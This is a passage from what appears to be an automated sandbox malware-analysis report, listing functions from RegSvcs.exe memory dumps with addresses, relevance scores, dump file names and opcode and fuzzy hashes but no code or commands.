                          • Instruction Fuzzy Hash: DEE14071E103098FEB65DB64D4906AEBFB2EB88300F208969D405EB395DB75DC42CB91
                          Function 06B0B292 Relevance: .3, Instructions: 306COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 0000000F.00000002.2671063416.0000000006B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B00000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_6b00000_RegSvcs.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 721bc04623cb9a25863d8155ae4626b8c31dbf48f87fc471e9985879cc0a19de
                          • Instruction ID: 14a2cf72d318e80ef6f45c06d1bb2c0c19bd5cadd1aaf49ad0177ac073f65618
                          • Opcode Fuzzy Hash: 721bc04623cb9a25863d8155ae4626b8c31dbf48f87fc471e9985879cc0a19de
                          • Instruction Fuzzy Hash: 3EB164B4E001099BFF64DAA8D4907ADBFB6FB49310F209465E505EB3D1CA3ADD418B51
                          Function 06B0B6A0 Relevance: .3, Instructions: 267COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 0000000F.00000002.2671063416.0000000006B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B00000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_6b00000_RegSvcs.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 3d6267cd85270d6d10c08f60fa25985ea82eb5abba5a2153f2356072b3054b71
                          • Instruction ID: edd6f2cff808dcca24350d9e9c273460a6976a9c4a77453b62802e710bd385db
                          • Opcode Fuzzy Hash: 3d6267cd85270d6d10c08f60fa25985ea82eb5abba5a2153f2356072b3054b71
                          • Instruction Fuzzy Hash: 9DA15FB4E102098FEF64CB58C580BADBFB1FB45310F2495A6E459EB391DA36EC81CB51
                          Function 06B091B8 Relevance: .2, Instructions: 230COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 0000000F.00000002.2671063416.0000000006B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B00000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_6b00000_RegSvcs.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 8f81853b4c811c18c8225dfc180340e065ad3398d19bd09e5674b20600fd2308
                          • Instruction ID: 20b26a384d7190552250c8557d258b4cd7cd763c9a807ca849d617badfb82d17
                          • Opcode Fuzzy Hash: 8f81853b4c811c18c8225dfc180340e065ad3398d19bd09e5674b20600fd2308
                          • Instruction Fuzzy Hash: 82917271B002098FEB54EF65D8507AEBBF2EF88700F1494A9D409EB385EB789D418B90
                          Function 06B06258 Relevance: .2, Instructions: 229COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 0000000F.00000002.2671063416.0000000006B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B00000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_6b00000_RegSvcs.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 328facf490953cf0417e610e40cc89d0f07310a7d6266b5cf8201fd4050a3e5e
                          • Instruction ID: 142caf81854de0129e0e165702f70e95b830277c2694a15dc2f903d21ce93072
                          • Opcode Fuzzy Hash: 328facf490953cf0417e610e40cc89d0f07310a7d6266b5cf8201fd4050a3e5e
                          • Instruction Fuzzy Hash: E061C3B1F001114BEB259B6EC95496EBFE7EFC4620B194479D80AEB360EE75EC0287D1
                          Function 06B04350 Relevance: .2, Instructions: 221COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 0000000F.00000002.2671063416.0000000006B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B00000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_6b00000_RegSvcs.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 7dfa246b42c6d6488311057eb852d394c88dfa5b99f83a466ea0dbed82ffcbfc
                          • Instruction ID: 42023d4a84a762da9377be205b58d96a6b2e86b2a49e62bf95e6d3af81a803e8
                          • Opcode Fuzzy Hash: 7dfa246b42c6d6488311057eb852d394c88dfa5b99f83a466ea0dbed82ffcbfc
                          • Instruction Fuzzy Hash: 76814E71B002098BDF54DFA9C5A076EBBF2EB89300F149569D90AEB395EB34DC428B51
                          Function 06B04670 Relevance: .2, Instructions: 219COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 0000000F.00000002.2671063416.0000000006B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B00000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_6b00000_RegSvcs.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 5a6668bcd14efa1a40abbfef62d714ae294dd578beb16a0a013317762cf80666
                          • Instruction ID: 116ee93abe93453bcea616b5905865be867c2f994615d0aafb42b200e60c8285
                          • Opcode Fuzzy Hash: 5a6668bcd14efa1a40abbfef62d714ae294dd578beb16a0a013317762cf80666
                          • Instruction Fuzzy Hash: 32914E74E002198FEF60DF68C850B9DBBB1FF89300F208595D549BB295DB70AA85CF90
                          Function 06B04360 Relevance: .2, Instructions: 218COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 0000000F.00000002.2671063416.0000000006B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B00000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_6b00000_RegSvcs.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 235f6682b7c17b95301b11f1cad999eea5eca63f905fa4ea8ef9bd4b33922cb4
                          • Instruction ID: 5127cb80d814cc6d6e26edcca4ca9f40523ba6e5680669ef8576b4239ca4a8ed
                          • Opcode Fuzzy Hash: 235f6682b7c17b95301b11f1cad999eea5eca63f905fa4ea8ef9bd4b33922cb4
                          • Instruction Fuzzy Hash: 79813C71B002098BDF54DFA9D5A066EBBF2EB89300F148469D90AEB395EB35DC428B51
                          Function 06B04688 Relevance: .2, Instructions: 210COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 0000000F.00000002.2671063416.0000000006B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B00000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_6b00000_RegSvcs.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: c29cbb9d920d03a5693e08fdde568ca2d3f22c78204dd03fab5038614c7c547f
                          • Instruction ID: cdd6d736b310c7ec30848101d8387a2e3288994769175f793a7eb2260ca35377
                          • Opcode Fuzzy Hash: c29cbb9d920d03a5693e08fdde568ca2d3f22c78204dd03fab5038614c7c547f
                          • Instruction Fuzzy Hash: DE913F74E10219CBEF60DF64C890B9DBBB1FF89310F208595D549BB285DB71A985CF90
                          Function 06B0EF80 Relevance: .2, Instructions: 201COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 0000000F.00000002.2671063416.0000000006B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B00000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_6b00000_RegSvcs.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 6bcf2ff145c79ae07c0039b7e0f5157988949d90405f4ff6ba18873e9eecddc9
                          • Instruction ID: d83e33eec5418b9d0ab1ca6e13162bf8f9ecd1b5d6ab1386c55d59f1006d79a2
                          • Opcode Fuzzy Hash: 6bcf2ff145c79ae07c0039b7e0f5157988949d90405f4ff6ba18873e9eecddc9
                          • Instruction Fuzzy Hash: 24711CB0B002189FEB54DBA9D990AADBFF6EF88300F148469D415AB394DB34ED46CB50
                          Function 06B0EF70 Relevance: .2, Instructions: 201COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 0000000F.00000002.2671063416.0000000006B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B00000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_6b00000_RegSvcs.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 69adfdcaa37ef8cac3bdaa9264cf1485396818cdbd83ab26b55a12ae90c715a6
                          • Instruction ID: 8c7bf7289e2ece506595e955e9e559f7ed0a9b013c565a29524f9c6e13f22ff4
                          • Opcode Fuzzy Hash: 69adfdcaa37ef8cac3bdaa9264cf1485396818cdbd83ab26b55a12ae90c715a6
                          • Instruction Fuzzy Hash: 60712CB0B002099FEB54DBA8D990AADBFF6FF88300F148469D455AB395DB34ED46CB50
                          Function 06B04C20 Relevance: .2, Instructions: 186COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 0000000F.00000002.2671063416.0000000006B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B00000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_6b00000_RegSvcs.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: ef3f8e8605047b71848496fe6f6c559bab275bf761c8c1ea127035d107ae94b1
                          • Instruction ID: 2befe23b35a788e29f2acc4b5ab05df5b45b182a99a155e0018776c3e0ad1e41
                          • Opcode Fuzzy Hash: ef3f8e8605047b71848496fe6f6c559bab275bf761c8c1ea127035d107ae94b1
                          • Instruction Fuzzy Hash: D9616C71E102089FEB549BA5C8547AEBFF6EB88710F208469E10AAB394DF755C458F90
                          Function 06B0FCE0 Relevance: .2, Instructions: 173COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 0000000F.00000002.2671063416.0000000006B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B00000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_6b00000_RegSvcs.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 7f237dcda8f88d9c1bae7d730a7a3457c99c864fe401cc22ae9f34dd885a0c97
                          • Instruction ID: 5a926f9b3e2a56ac267d416ed36e71b7cb2f7bc41c6d2c4c8e3143b766c270c9
                          • Opcode Fuzzy Hash: 7f237dcda8f88d9c1bae7d730a7a3457c99c864fe401cc22ae9f34dd885a0c97
                          • Instruction Fuzzy Hash: 6F51DFB1F10209DFEB64EB78E4542BDBFB6FB84311F1089A9E506E7291DB358855CB80
                          Function 06B0FA8F Relevance: .2, Instructions: 171COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 0000000F.00000002.2671063416.0000000006B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B00000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_6b00000_RegSvcs.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: ae71cfe98342808fa40d47d44e3162da3a01299fb93d8b52b1b868f7738cbd19
                          • Instruction ID: 9903e7b45c6862c46c078b06c72313bf23072123171f6192d88c06fdb24edbd3
                          • Opcode Fuzzy Hash: ae71cfe98342808fa40d47d44e3162da3a01299fb93d8b52b1b868f7738cbd19
                          • Instruction Fuzzy Hash: 005192B0B102049BFF749A68D954B7E2E6EE789310F20447AE80BD73D1C97DCC5187A2
                          Function 06B0FAA0 Relevance: .2, Instructions: 163COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 0000000F.00000002.2671063416.0000000006B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B00000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_6b00000_RegSvcs.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 0920db1d64c1c6f5fa78e6b07da271ad8abcfcf4b54f3f44bfb899a93983321d
                          • Instruction ID: 4f14f27dc20d74844cb5314f89fc4fbc1bdd5f18f5a19c9bf82c10d1aa1a02f6
                          • Opcode Fuzzy Hash: 0920db1d64c1c6f5fa78e6b07da271ad8abcfcf4b54f3f44bfb899a93983321d
                          • Instruction Fuzzy Hash: DB5194B0B102149BFF74AA68D99477E2E6EE789310F20443AE80BD73D4C97DCC518791
                          Function 06B091A8 Relevance: .2, Instructions: 159COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 0000000F.00000002.2671063416.0000000006B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B00000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_6b00000_RegSvcs.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 9e5a616e9a43ee4a6f414b8b35426aa8b90c6ecc23defe473f7dcc672ceb502a
                          • Instruction ID: cf51f8869e310e74cab50e5154c61ca17b2913f32c10f96ea5cb0f056a61baff
                          • Opcode Fuzzy Hash: 9e5a616e9a43ee4a6f414b8b35426aa8b90c6ecc23defe473f7dcc672ceb502a
                          • Instruction Fuzzy Hash: 48517271B001058FEB54EF79D960B6E7BF2EF88700F549469C40AEB395DB399C419BA0
                          Function 06B04C11 Relevance: .1, Instructions: 137COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 0000000F.00000002.2671063416.0000000006B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B00000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_6b00000_RegSvcs.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 5b31a80cac4ac2030d562a69dad17e91093128e2aa49c5cdeb2671ce6c8becd7
                          • Instruction ID: 67efc1b50cca28c1fbd344de8ae40d36767432e36f072ab7baa14ead70b010a9
                          • Opcode Fuzzy Hash: 5b31a80cac4ac2030d562a69dad17e91093128e2aa49c5cdeb2671ce6c8becd7
                          • Instruction Fuzzy Hash: 06515E70F102089FEB549FA5C914BAEBBF7EF88700F24C569E106AB394DA759C018B90
                          Function 06B05640 Relevance: .1, Instructions: 128COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 0000000F.00000002.2671063416.0000000006B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B00000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_6b00000_RegSvcs.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: b4f12ac462409d98d9c46065aa4864de4112c4f31878eb7926de831888345a80
                          • Instruction ID: 0349c1ab4bbc45d8f836e10a144494f54aaabf55261d86154d04788668bdfea1
                          • Opcode Fuzzy Hash: b4f12ac462409d98d9c46065aa4864de4112c4f31878eb7926de831888345a80
                          • Instruction Fuzzy Hash: E74184B6E102458FEF708E69C58077EBFA2EB45314F10D8A9D45ADBAC1C634D841DF91
                          Function 06B054D8 Relevance: .1, Instructions: 126COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 0000000F.00000002.2671063416.0000000006B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B00000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_6b00000_RegSvcs.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 6982cff2ab10e66ae1391705093ed51024876241f32eb1d5561cffecc0945b49
                          • Instruction ID: 02610bab930dba474acbd0b77824fcaa454f34df724faab5abe6692fc2244b58
                          • Opcode Fuzzy Hash: 6982cff2ab10e66ae1391705093ed51024876241f32eb1d5561cffecc0945b49
                          • Instruction Fuzzy Hash: 7A4144B6E006098FEF70CE99D980BAFFFB2EB44210F105965D215D7650D730E8458F90
                          Function 06B0DB38 Relevance: .1, Instructions: 117COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 0000000F.00000002.2671063416.0000000006B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B00000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_6b00000_RegSvcs.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: a4b2919e7f895b7a7382bfac9ff97e9e3de043b4e74e9149879dc1f3d80f4f23
                          • Instruction ID: c5434f08248c588dc7a81ccfcd0c5fe00fe172a0a9332b8078843f0f125a5d91
                          • Opcode Fuzzy Hash: a4b2919e7f895b7a7382bfac9ff97e9e3de043b4e74e9149879dc1f3d80f4f23
                          • Instruction Fuzzy Hash: 60417CB0E006099FEB64DFA5D49466EBFB6FF85340F208969D405EB280DB75D942CB81
                          Function 06B0DB25 Relevance: .1, Instructions: 116COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 0000000F.00000002.2671063416.0000000006B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B00000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_6b00000_RegSvcs.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 7a5773de65aa62d67d2365cf5f3010241d045f932c06b5a9cc1e5a375f8ab9df
                          • Instruction ID: 7065bf2ebffceaec24c3b4f9e8e3ce8ca3d110875e6d403fb1025a833a5137e9
                          • Opcode Fuzzy Hash: 7a5773de65aa62d67d2365cf5f3010241d045f932c06b5a9cc1e5a375f8ab9df
                          • Instruction Fuzzy Hash: 08418F70E006099FEB64DFA5D89469EBFB2FF85300F148969D401EB280DB74D842CB51
                          Function 06B0228D Relevance: .1, Instructions: 110COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 0000000F.00000002.2671063416.0000000006B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B00000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_6b00000_RegSvcs.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: c61cbf25c3963f3227f4518767f62fb6cc264c39540ed451b76b8ba0e7252ca5
                          • Instruction ID: 1fe1889552fb963d2e0797ed1720597b530e42983415e862f524e9398ecc97f5
                          • Opcode Fuzzy Hash: c61cbf25c3963f3227f4518767f62fb6cc264c39540ed451b76b8ba0e7252ca5
                          • Instruction Fuzzy Hash: 15310131B002058FEB689B75D55866E3FF7EB89710B5488A8D402EB380DE39DD4ACB90
                          Function 06B022A0 Relevance: .1, Instructions: 105COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 0000000F.00000002.2671063416.0000000006B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B00000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_6b00000_RegSvcs.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: f2b3ea34296703aaeaafd1d03bad33fdc082cda7df17a75980601917cf980751
                          • Instruction ID: d7b8d38d65ccf57aa59eeaef6c8dc7844805cad7aed6b3cf377f56dc30215bf5
                          • Opcode Fuzzy Hash: f2b3ea34296703aaeaafd1d03bad33fdc082cda7df17a75980601917cf980751
                          • Instruction Fuzzy Hash: 0C31F271F002058FEB689B75D55866E3FE3EB88300B2088A8D402EB380DE39CD46CB91
                          Function 06B0D9D8 Relevance: .1, Instructions: 101COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 0000000F.00000002.2671063416.0000000006B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B00000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_6b00000_RegSvcs.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 8da2a09cb0a6090013c794bd7168b2bc0c73f2aa887e263cce9474ff0cc70c6f
                          • Instruction ID: 23906952c2a8099d58aceded25f9e7f3267960245668cdbe9ff1778f06cc37b8
                          • Opcode Fuzzy Hash: 8da2a09cb0a6090013c794bd7168b2bc0c73f2aa887e263cce9474ff0cc70c6f
                          • Instruction Fuzzy Hash: 2C31A770E103099FDB25DFA4C99069EBFB2EF84300F208969E505FB290DB70E9468B90
                          Function 06B02150 Relevance: .1, Instructions: 98COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 0000000F.00000002.2671063416.0000000006B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B00000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_6b00000_RegSvcs.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 08111320480a70551f0dc73c930ffc9de1c370898f3a302f8f2db6e1c80de376
                          • Instruction ID: f174090ba60e2924b83204087f1368b6f0275dd5fba9b4305fa17a7b3b4db06f
                          • Opcode Fuzzy Hash: 08111320480a70551f0dc73c930ffc9de1c370898f3a302f8f2db6e1c80de376
                          • Instruction Fuzzy Hash: AA317E71E102199FDB15CFA4C898A9EBBF2FF89700F108969E906E7390DB71AD45CB50
                          Function 06B02160 Relevance: .1, Instructions: 91COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 0000000F.00000002.2671063416.0000000006B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B00000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_6b00000_RegSvcs.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 407a3f32f3267ae75eaed2874ba828399a067a6bcba6e14363a1dc77ce44267a
                          • Instruction ID: 1be7441c97bd5e53da1422b7307f7e0d1fa33e182420647d06c77157a557c1d3
                          • Opcode Fuzzy Hash: 407a3f32f3267ae75eaed2874ba828399a067a6bcba6e14363a1dc77ce44267a
                          • Instruction Fuzzy Hash: 94318071E102199BDB59CFA4C89869EBFF2FF89300F108969E906E7390DB71AD45CB50
                          Function 06B03B50 Relevance: .1, Instructions: 84COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 0000000F.00000002.2671063416.0000000006B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B00000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_6b00000_RegSvcs.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: a2a63ccc592b4fa9780c011da32ab69178a1397464a92d90be2d08e807f69a8b
                          • Instruction ID: 7b5703d3397d2f6fb050278307cb9207317aa509153f2e36aa0dc6d9e6498c89
                          • Opcode Fuzzy Hash: a2a63ccc592b4fa9780c011da32ab69178a1397464a92d90be2d08e807f69a8b
                          • Instruction Fuzzy Hash: 9E315CB5E002159FEB50DF69D980A9EBFF5EB48750F14806AE901EB390E7389C518BA4
                          Function 06B03B60 Relevance: .1, Instructions: 78COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 0000000F.00000002.2671063416.0000000006B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B00000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_6b00000_RegSvcs.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 42098de95f91feb9e02d4c57beb81de0fc8d60758853184789c5e5d4c7e07de3
                          • Instruction ID: e06b97e775e30d97abe7d9369c694d66489ebff79ac8563c69a9ccf9fe0b7aaf
                          • Opcode Fuzzy Hash: 42098de95f91feb9e02d4c57beb81de0fc8d60758853184789c5e5d4c7e07de3
                          • Instruction Fuzzy Hash: 6C218B75E002158FEB50DF69D980AAEBFF5EB48750F108079E905EB390EB38DC418BA4
                          Function 02E2D044 Relevance: .1, Instructions: 72COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 0000000F.00000002.2662141537.0000000002E2D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E2D000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_2e2d000_RegSvcs.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 51ac4b650b61b6cd2bf865728a1ca708eb9d827d133b7d0830008b052aedeabf
                          • Instruction ID: 31f1a91f298b53c28b7265cc96739a2c1a229fc235e6498bd7073626cb33fdab
                          • Opcode Fuzzy Hash: 51ac4b650b61b6cd2bf865728a1ca708eb9d827d133b7d0830008b052aedeabf
                          • Instruction Fuzzy Hash: 32210771544344DFDB14DF10CDC0F26BB66FB88318F24C56DEA4A4B292C736D84ACA62
                          Function 06B06D80 Relevance: .1, Instructions: 68COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 0000000F.00000002.2671063416.0000000006B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B00000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_6b00000_RegSvcs.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: febcc993aa2855db3a6ae0d1c5fb04cf11fc4137e39c7be0392796f1969bf436
                          • Instruction ID: 4d4a2146249cb71bee9c984d03bb9339e21518146412e7d5f5fcbe589b32fbee
                          • Opcode Fuzzy Hash: febcc993aa2855db3a6ae0d1c5fb04cf11fc4137e39c7be0392796f1969bf436
                          • Instruction Fuzzy Hash: DE210F70F101088BEF44DB69E9506AEBFB2EB84310F2485B8D405EB381EB36AC108B90
                          Function 06B0AF88 Relevance: .1, Instructions: 62COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 0000000F.00000002.2671063416.0000000006B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B00000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_6b00000_RegSvcs.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 864ce607d9790ccc47d0efc52864bcaeee14e9687a913b64a5841924e4271dc2
                          • Instruction ID: f2c22a89687de8e24153820528b50655497206ffa1f821a49cf17cc45ab842c7
                          • Opcode Fuzzy Hash: 864ce607d9790ccc47d0efc52864bcaeee14e9687a913b64a5841924e4271dc2
                          • Instruction Fuzzy Hash: D4117FB1D1075A9BDB21CFA9C45069EBFF5FF85340F10496AE805FB280D771A845CB81
                          Function 06B03C70 Relevance: .1, Instructions: 59COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 0000000F.00000002.2671063416.0000000006B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B00000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_6b00000_RegSvcs.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 512675fae62d4c70a0c24fcdb7de0e9c1bb1522008ffcd0744db0ac53542e46c
                          • Instruction ID: 66aa55a21205e01f18c01998e4ac1445cebeef5698e4a8963a3b6d57b1a1cb75
                          • Opcode Fuzzy Hash: 512675fae62d4c70a0c24fcdb7de0e9c1bb1522008ffcd0744db0ac53542e46c
                          • Instruction Fuzzy Hash: 4211E532B101294FDF549A78DC186AE7BF6EBC9701F04857AD806E7380DE25DC0147E0
                          Function 06B042B0 Relevance: .1, Instructions: 55COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 0000000F.00000002.2671063416.0000000006B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B00000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_6b00000_RegSvcs.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: a3e46eaab67a6517fac311d9b2303bd0480b1edee5a8cd9fda0608baf8ca1e7b
                          • Instruction ID: f8462c08a25e905499d04846c89839f5495de04e63beccc0b8ddcbf06334da21
                          • Opcode Fuzzy Hash: a3e46eaab67a6517fac311d9b2303bd0480b1edee5a8cd9fda0608baf8ca1e7b
                          • Instruction Fuzzy Hash: A501D4B5B102104FEB6595ACA81172BBFE6DBCA720F10947DE20ACB392EE65DC024391
                          Function 06B0A36F Relevance: .1, Instructions: 53COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 0000000F.00000002.2671063416.0000000006B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B00000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_6b00000_RegSvcs.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 39d597ea85614a7f8de93da29d0c902bb06eadfbaeacc0bc4bb80dc2b9982293
                          • Instruction ID: 4fb7bb4f54272134b629eb94cde8451a04bb0966dd7446fbc6a32c65086176f5
                          • Opcode Fuzzy Hash: 39d597ea85614a7f8de93da29d0c902bb06eadfbaeacc0bc4bb80dc2b9982293
                          • Instruction Fuzzy Hash: 8E012435B002004FEB65DA68DA5075E7FE2EB89700F1088BEE00ADB392EF34DC028780
                          Function 06B03928 Relevance: .1, Instructions: 53COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 0000000F.00000002.2671063416.0000000006B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B00000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_6b00000_RegSvcs.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: aabeaa335c435ea2d161584543522edc8b1c3769831bd947f71022c407f910f2
                          • Instruction ID: 866ed0f463ccdf553397bf837e3f4c6d6da0f880f1aeb77a4c3123afe4fa6906
                          • Opcode Fuzzy Hash: aabeaa335c435ea2d161584543522edc8b1c3769831bd947f71022c407f910f2
